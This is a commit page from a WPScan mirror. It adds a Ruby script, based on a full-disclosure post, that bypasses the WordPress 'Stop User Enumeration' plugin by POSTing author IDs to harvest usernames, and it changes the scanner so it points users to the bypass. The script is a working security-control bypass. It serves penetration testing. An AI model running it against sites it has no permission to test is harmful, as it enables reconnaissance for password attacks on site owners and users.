garfield/wpscan
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Fixes #456 - stop-user-enumeration detection & script for bypass

Browse Source
This commit is contained in:
erwanlr
2014-04-16 15:09:41 +02:00
parent f77a27ecc3
commit 45f5f50262
2 changed files with 78 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

73
stop_user_enumeration_bypass.rb Executable file
View File

@@ -0,0 +1,73 @@
#!/usr/bin/env ruby
# encoding: UTF-8
#
#
# Script based on http://seclists.org/fulldisclosure/2014/Feb/3
require File.join(File.dirname(__FILE__), 'lib/wpscan/wpscan_helper')
@opts = {
ids: 1..10,
verbose: false,
user_agent: 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0'
}
parser = OptionParser.new('Usage: ./stop_user_enumeration_bypass.rb <Target URL> [options]', 35) do |opts|
opts.on('--proxy PROXY', 'Proxy to use') do |proxy|
@opts[:proxy] = proxy
end
opts.on('--auth Username:Password', 'Credentials to use if Basic/NTLM auth') do |creds|
@opts[:creds] = creds
end
opts.on('--ids START-END', 'The ids to check, default is 1-10') do |ids|
@opts[:ids] = Range.new(*ids.split('-').map(&:to_i))
end
opts.on('--user-agent UA', 'The user-agent to use') do |ua|
@opts[:user_agent] = ua
end
opts.on('--verbose', '-v', 'Verbose Mode') do
@opts[:verbose] = true
end
end
begin
parser.parse!
fail "#{red('The target URL must be supplied')}\n\n#{parser}" unless ARGV[0]
uri = URI.parse(add_trailing_slash(add_http_protocol(ARGV[0])))
request_params = {
proxy: @opts[:proxy],
userpwd: @opts[:creds],
headers: { 'User-Agent' => @opts[:user_agent] },
followlocation: true,
ssl_verifypeer: false,
ssl_verifyhost: 2
}
detected_users = WpUsers.new
@opts[:ids].each do |user_id|
user = WpUser.new(uri, id: user_id)
if user.exists_from_response?(Typhoeus.post(uri, request_params.merge(body: { author: user_id })))
detected_users << user
end
end
puts 'Usernames found:'
detected_users.output
rescue => e
puts e.message
if @opts[:verbose]
puts red('Trace:')
puts red(e.backtrace.join("\n"))
end
exit(1)
end

5
wpscan.rb
View File

@@ -296,6 +296,11 @@ def main
puts puts
puts "#{green('[+]')} Enumerating usernames ..." puts "#{green('[+]')} Enumerating usernames ..."
if wp_target.has_plugin?('stop-user-enumeration')
puts "#{red('[!]')} Stop User Enumeration plugin detected, results might be empty. " \
"However a bypass exists, see stop_user_enumeration_bypass.rb in #{File.expand_path(File.dirname(__FILE__))}"
end
wp_users = WpUsers.aggressive_detection(wp_target, wp_users = WpUsers.aggressive_detection(wp_target,
enum_options.merge( enum_options.merge(
range: wpscan_options.enumerate_usernames_range, range: wpscan_options.enumerate_usernames_range,